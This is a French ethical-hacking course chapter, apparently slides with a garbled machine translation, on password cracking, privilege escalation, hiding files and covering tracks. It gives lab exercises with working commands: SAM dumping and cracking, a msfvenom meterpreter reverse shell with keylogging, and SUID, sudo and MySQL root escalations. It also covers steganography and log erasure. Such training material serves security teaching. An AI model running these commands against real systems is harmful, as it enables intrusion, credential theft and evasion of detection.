Vous êtes sur la page 1sur 26

SOMMAIRE

• Chap01: Introduction au «piratage éthique»

• Chap02: Collecte d'informations sur les cibles: reconnaissance, empreinte et ingénierie sociale

• Chap03: Collecte des informations sur le réseau et l'hôte: analyse et énumération

• Chap04: SystemHacking: Cracking de mot de passe, augmentation des privilèges et masquage de fichiers

• Chap05: chevaux de Troie, portes dérobées, virus et vers Chap06:

• collecte de données à partir de réseaux: renifleurs Chap07: déni de

• service et piratage de session

• Chap08: Piratage Web: Google, serveurs Web, vulnérabilités des applications Web et techniques de piratage de mots de passe

basées sur le Web

• Chap09: Attaquer les applications Web: injection SQL et débordements de tampon Chap10: piratage

• de réseau sans fil

• Chap11: Sécurité du site physique Chap12:

• Piratage des systèmes Linux

• Chap13: Piratage des plates-formes mobiles (Android) Chap14:

• Cryptanalyse
ChaCphap Piratage du système: Cracking de mot de passe,

44 Escalade des privilèges


OBJECTIFS COUVERTS etDANS
masquage des fichiers
CE CHAP

01
05
Comprendre le mot de passe
techniques de craquage
Comprendre les keyloggers
et autres logiciels espions

les technologies

02 Comprendre différent
types de mots de passe 06 Comprendre comment se cacher
des dossiers

03 Identifier divers
outils de craquage de mots de passe
07 Comprendre la stéganographie
les technologies

04 Comprendre l'escalade
privilèges 08 Comprendre comment couvrir
vos traces et effacez les

preuves
Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Cracking de mot de passe

Renifler: Le mot de passe est

capturé pendant le processus d'authentification et peut

ensuite être comparé à un fichier de dictionnaire ou à

une liste de mots.

L'homme au milieu

(MITM):
Hacker intercepte la demande d'authentification et la transmet au

serveur. En insérant un renifleur entre le client et le serveur, le

pirate est capable de renifler les deux connexions et de capturer

les mots de passe dans le processus


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Cracking de mot de passe

Force brute dictionnaire Hybride


attaque Attaque Attaque

Essaye tout possible U E


jeeps ré
comme UNE
épées d'un Remplace les nombres de
combinaisons de lettres, liste des mots du dictionnaire symboles pour mot de passe

numéros et spéciaux personnages

personnages

Mme! Tr245 @ F5a Administrateur Adm1n1strator


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Attaques
Cracking de mot non électroniques
de passe

Les attaques non électroniques - ou non techniques - sont des attaques qui n'utilisent aucune connaissance
technique. Ce type d'attaque peut inclure l'ingénierie sociale, le surf sur l'épaule, le reniflement du clavier et la
plongée dans les poubelles

ÉPAULE PLONGÉE EN DUMPSTER

SURFANT
pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 ( SAM ) est un fichier de base de données


Exercice 4.1: Cracking Windows Security Account Manager
1. Sur Windows 7 VM, créez un nouvel utilisateur avec le mot de passe 123456

2. Sur une copie de Windows 7 Outils \ Chap 4 \ pwdump7 et john-1.9.0-jumbo-1-win64

3. Ouvrez cmd (en tant qu'administrateur)

4. Tapez: chemin cd vers pwdump7

5. Tapez: PwDump7.exe> I: \ hash.txt • Exporter le fichier SAM

6. Tapez: chemin cd vers john

7. Exécution de CD

8. Tapez: john --format = NT I: \ hash.txt • craquer le hachage

9.: john - show I: \ hash.txt


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 • Si toutes les autres tentatives de collecte de mots de passe échouent, un


Enregistreurs de frappe et autres technologies de logiciels espions
enregistreur de frappe est l'outil de choix pour les pirates. Les

enregistreurs de frappe (enregistreurs de frappe) peuvent être mis en

œuvre à l'aide de matériel ou de logiciel.

• Les enregistreurs de frappe matériels sont de petits périphériques

matériels qui connectent le clavier au PC et enregistrent chaque frappe

dans un fichier ou dans la mémoire du périphérique matériel. Afin

d'installer un keylogger matériel, un pirate doit avoir un accès physique

au système.

• Les keyloggers logiciels sont des logiciels furtifs qui se situent entre le

matériel du clavier et le système d'exploitation afin qu'ils puissent

enregistrer chaque frappe. Les keyloggers logiciels peuvent être déployés

sur un système par des chevaux de Troie ou des virus


pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 Exercice 4.2: Enregistreur de frappe faire avec msfvenom


• Prérequis de l'atelier:
- Windows 7 VM
- Kali-linux

• Objectif: créer un kelogger avec msfvenom pour enregistrer le mot de passe saisi par la victime et l'envoyer à l'attaquant

• Pas:

1- Générer une charge utile:


root @ kali : ~ # msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.129.129 LPORT = 4444
- f exe -o shell.exe

2- Copiez la charge utile dans le répertoire www de Kali:


root @ kali : ~ # sudo mkdir / var / www / html / tools

root @ kali : ~ # sudo cp shell.exe / var / www / html / tools

3- Lancez metasploit:

root @ kali : ~ # msfconsole


msf> utiliser multi / handler
exploit msf (multi / gestionnaire)> définir LHOST 192.168.129.129 exploit msf (multi
/ gestionnaire)> définir LPORT 4444
exploit msf (multi / handler)> définir la charge utile windows / meterpreter / reverse_tcp exploit msf (multi /
handler)> exploiter
Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Exercice 4.2: Enregistreur de frappe faire avec msfvenom


À partir de Windows 7:

Aller à http: // ip_of_kali / tools et téléchargez le shell, installez exe

À Kali: une session de mètrepreter est lancée

mètrepreter> ps
meterpreter> ps | grep connexion Filtrage

sur 'ouverture de session'


Liste des processus

============
Nom PPID PID Utilisateur de la session Arch Chemin

----------- --------------- ----


868 1004 winlogon.exe x64 1 C: \ Windows \ AUTORITE NT \ Système
System32 \ winlogon.exe
meterpreter> migrer 868
[*] Migration de 6080 à 868 ...
[*] Migration terminée avec succès.
meterpreter> keyscan_start
Démarrage du sniffer de frappe ...
meterpreter> keyscan_dump
Vidage des frappes capturées ...
06155977 <CR>
Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 • des
Augmentation L'escalade des privilèges signifie essentiellement l'ajout de droits ou
privilèges

d'autorisations supplémentaires à un compte utilisateur. En termes

simples, l'augmentation des privilèges transforme un compte

utilisateur régulier en compte administrateur.

• En règle générale, les comptes d'administrateur ont des exigences

de mot de passe plus strictes. S'il n'est pas possible de trouver un

nom d'utilisateur et un mot de passe d'un compte avec des privilèges

d'administrateur, un pirate peut choisir d'utiliser un compte avec des

privilèges inférieurs. Dans ce cas, le pirate doit ensuite augmenter

les privilèges de ce compte

• le pirate est capable d'exécuter des applications, le système

est considéré possédé et sous le contrôle du hacker


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Augmentation des privilèges


Techniques utilisées pour l'escalade de privilèges

1 K EXPLOITER ERNEL
Les exploits du noyau sont des programmes qui exploitent les vulnérabilités du noyau

afin d'exécuter du code arbitraire avec des autorisations élevées. Les exploits réussis

du noyau donnent généralement aux attaquants un accès super utilisateur aux

systèmes cibles sous la forme d'une invite de commande root. Dans de nombreux cas,

escalader vers root sur un système Linux est aussi simple que de télécharger un

exploit du noyau sur le système de fichiers cible, de compiler l'exploit, puis de

l'exécuter.

Exemple: exploit DirtyCow - Noyau Linux <= 3.19.0-73.8

- $ uname -a - nous donne la version du noyau dont nous savons qu'elle est vulnérable à dirtycow

- Téléchargé l'exploit dirtycow à partir d'ici - https://www.exploit-db.com/exploits/40839/

- Compilé et exécuté (GCC). Il remplace l'utilisateur «root» par un nouvel utilisateur «rash» en éditant le fichier / etc / passwd.

«$ Searchsploit Linux Kernel xx, x »


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Augmentation des privilèges


Techniques utilisées pour l'escalade de privilèges

2 E SERVICES XPLOITING QUI


SONT RUNNINGAS ROOT

Vous devez toujours vérifier si les serveurs Web, les serveurs de

messagerie, les serveurs de base de données, etc. fonctionnent en

tant que root. Souvent, les administrateurs Web exécutent ces services

en tant que root et oublient les problèmes de sécurité qu'ils peuvent

causer. Il pourrait y avoir des services qui s'exécutent localement et ne

sont pas exposés publiquement qui peuvent également être exploités.

E XEMPLE: E XPLOITER UNE VERSION VULNÉRABLE DE M Oui SQL


QUI FONCTIONNE COMME ROOT POUR OBTENIR UN ACCÈS ROOT

$ ps -aux | grep racine • / usr / sbin / mysqld - Il nous montre les services

qui fonctionnent en tant que root.


mysql> sélectionnez sys_exec ('cp / bin / sh / tmp /; chown root: root / tmp / sh; chmod
+ s / tmp / sh ')
mysql> quitter
user1t @ serveur : ~ $ ls / tmp /
sh
user1t @ serveur : / tmp $ ./sh
# qui suis je
racine
Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Augmentation des privilèges


Techniques utilisées pour l'escalade de privilèges

3 E XPLOITER SUID E XÉCUTABLES


SUID, qui signifie set user ID, est une fonctionnalité Linux qui permet aux utilisateurs
d'exécuter un fichier avec les autorisations d'un utilisateur spécifié. Par exemple, la
commande ping Linux nécessite généralement des autorisations root pour ouvrir les
sockets réseau bruts. En marquant le programme ping comme SUID avec le
propriétaire comme root

$ find / -perm -u = s -type f 2> / dev / null:


• imprime les exécutables dont le bit SUID est défini

E XEMPLE: E XPLOITER SUID DANS NMAP

$ nmap - interactif - exécute le mode interactif nmap $! sh - Vous permet de vous

échapper vers le shell système à partir du shell nmap


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Augmentation des privilèges


Techniques utilisées pour l'escalade de privilèges

4 E XPLOITER SUDO DROITS / UTILISATEUR


Si l'attaquant ne peut pas obtenir directement l'accès root via d'autres techniques, il
peut essayer de compromettre l'un des utilisateurs qui ont accès à SUDO. Une fois
qu'il a accès à l'un des utilisateurs sudo, il peut essentiellement exécuter toutes les
commandes avec les privilèges root.

$ sudo -l
• Imprime les commandes que nous sommes autorisés à exécuter en tant que
SUDO

E XEMPLE: E XPLOITER SUDO DANS trouver

$ sudo find / home -exec sh -i \;


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Masquer des•fichiers
Un pirate
avec peut vouloir cacher des fichiers sur un système pour empêcher leur détection. Ces fichiers
attrib

peuvent ensuite être utilisés pour lancer une attaque sur le système. Il existe deux façons de masquer

des fichiers dans Windows. La première consiste à utiliser l'attribut

Exemple: attrib + h [fichier / répertoire]

- Créez un fichier sur votre bureau


- Cacher ce fichier avec attrib

Streaming de fichiers NTFS

• Le streaming de fichiers NTFS permet de créer un fichier caché dans un fichier légitime. Le fichier

caché n'apparaît pas dans une liste de répertoires, contrairement au fichier légitime. Un utilisateur ne

soupçonne généralement pas le fichier légitime, mais le fichier caché peut être utilisé pour stocker ou

transmettre des informations


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Exercice 4.3: Masquage de fichiers à l'aide de Streaming de fichiers NTFS


1. Sur la ligne de commande, entrez notepad test.txt

2. Mettez des données dans le fichier, enregistrez le fichier et fermez le Bloc-notes. L'étape 1 ouvrira le Bloc-notes.

3. Sur la ligne de commande, entrez dir test.txt et notez la taille du fichier.

4. Sur la ligne de commande, entrez notepad test.txt: hidden.txt. Tapez du texte dans le Bloc-notes,

enregistrez le fichier et fermez-le.

5. Vérifiez à nouveau la taille du fichier (elle doit être la même qu'à l'étape 3).

6. Ouvrez test.txt. Vous ne voyez que les données d'origine.

7. Entrez notepad test.txt: hidden.txt sur la ligne de commande


pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 Stéganographie Les technologies

• La stéganographie est le processus de masquage des

données dans d'autres types de données telles que des

images ou des fichiers texte. La méthode la plus populaire

pour cacher des données dans des fichiers consiste à utiliser

des images graphiques comme cachettes


pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 Exercice 4.4: Masquer des données dans une image à l'aide stégosuite
1. Installez la stegosuite dans kali: apt-get install stegosuite

2. Téléchargez n'importe quelle image d'Internet

3. root @ kali : ~ # stegosuite

4. Masquer un message avec mot de passe et bouton incorporer

5. Essayez de vérifier la nouvelle image: strings nom_fichier

6. Extraire le message avec le bouton Extraire


pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 1. Installez le steghide dans kali: apt-get install steghide Téléchargez n'importe quelle
Exercice 4.4: Masquage d'un fichier texte dans une image à l'aide Steghide
2. image sur Internet et nommez-la image, jpg root @ kali : ~ # steghide embed -cf

3. cvr.jpg -ef emb.txt root @ kali : ~ # nano secret.txt (Écrivez un message secret ici)

4.

5. root @ kali : ~ # steghide embed -cf image.jpg -ef secret.txt Entrez la phrase de

6. passe: (Choisissez un mot de passe)

sept. Entrez une nouvelle phrase secrète:

8. camouflage des données de "secret.txt" dans "image.jpg". terminé. Supprimer secret.txt

9.

dix. root @ kali : ~ # steghide extrait -sf image.jpg Entrez la

11. phrase de passe:

12. Ecriture des données extraites dans "secret.txt".

• (données extraites dans secret.txt)

1. root @ kali : ~ # cat secret.txt


pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 1. Masquage
Exercice 4.4:
2.
Copiez la neige de Tools \ Chap 4 \ snwdos32 vers C: Dans CMD,
d'un fichier texte dans un fichier texte à l'aide neige
accédez à C: / snowdos32

3. Créer un fichier: infile.txt avec le contenu «Ceci est un message public».

4. Dans CMD snow -C -m "Ceci est un message top secret !!!!" -p "mot de passe" infile.txt outfile.txt

5. Supprimer infile.txt

6. Décrypter avec: snow -C -p "password" outfile, txt


pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 Couvrir les pistes et effacer les preuves


• Une fois que les intrus ont réussi à obtenir l'accès administrateur sur un

système, ils essaient de couvrir leurs traces pour

empêcher la détection de leur présence (actuelle ou passée) sur le

système.

• Un hacker peut également essayer de retirer les preuves de leur identité ou de

leurs activités sur le système pour empêcher le traçage de leur identité ou de

leur emplacement par les autorités. Pour éviter la détection,

• Le pirate informatique efface tous les messages d'erreur ou événements de

sécurité qui ont été enregistrés . La désactivation de l'audit et l'effacement du

journal des événements sont deux méthodes utilisées par un pirate

informatique pour couvrir ses traces et éviter

détection
• La première chose que les intrus font après avoir été administrateur

les privilèges est désactiver l'audit . L'audit Windows enregistre certains

événements dans un fichier journal qui est stocké dans l'Observateur

d'événements Windows.
pC hune
C h une Hack i ng du système: Cr ack i ng de mot de passe, Esca
vue nette \\ < com
p
pute ARN moi >
lati ng Pr ivil eges et Hi di ng F il es

44 Couvrir les pistes et effacer les preuves: outils

Éliminateur de preuves
système de nettoyage des données pour les PC Windows. Il empêche les données indésirables de
devenir définitivement cachées dans le système. Il nettoie la corbeille, le cache Internet, les fichiers

système, les dossiers temporaires, etc. Evidence Eliminator peut également être utilisé par un pirate
informatique pour supprimer des preuves d'un système après une attaque.

Le elsave.exe
est un outil simple pour effacer le journal des événements. C'est basé sur la ligne de commande.

Linux

root @ kali : / var / log #


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44 Chap 4 La revue Des questions


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44
1. Comment s'appelle le processus de masquage de texte dans une image?

A. Stéganographie
Cryptage
C. Logiciel espion

D. Enregistrement des frappes

2. Pourquoi les pirates voudraient-ils couvrir leurs traces?


A. Pour empêcher une autre personne d'utiliser les programmes qu'elle a installés
sur un système cible
B. Pour empêcher la détection ou la découverte

3. Qu'est-ce que l'élévation des privilèges?

UNE. Créer un compte utilisateur avec des privilèges plus élevés.

B. Création d'un compte utilisateur avec des privilèges d'administrateur

C. Augmentation des privilèges sur un compte utilisateur

4. Quel type d'attaque de mot de passe serait le plus efficace contre le mot de
passe T63k # s23A?
UNE. dictionnaire

B. Hybride
C. Deviner le mot de passe

RÉ. Force brute


Hack i ng du système: Cr ack i ng de mot de passe, Esca

ChaCphap lati ng Pr ivil eges et Hi di ng F il es

44
5. Lequel des éléments suivants est une attaque passive en ligne?

A. Deviner le mot de passe


B. Reniflage du réseau
C. Attaque par force brute
D. Attaque par dictionnaire

6. Que faut-il pour installer un keylogger matériel sur un système cible?

A. L'adresse IP du système
B. Accès physique au système

7. Quelle est la méthode la plus simple pour obtenir un mot de passe?

UNE. Devinant.

B. Attaque de dictionnaire

C. Fissuration par force brute

8. Quel type d'application de piratage est Snow?


UNE. Cracker de mot de passe

B. Spyware
C. Stéganographie
RÉ. Force brute

Vous aimerez peut-être aussi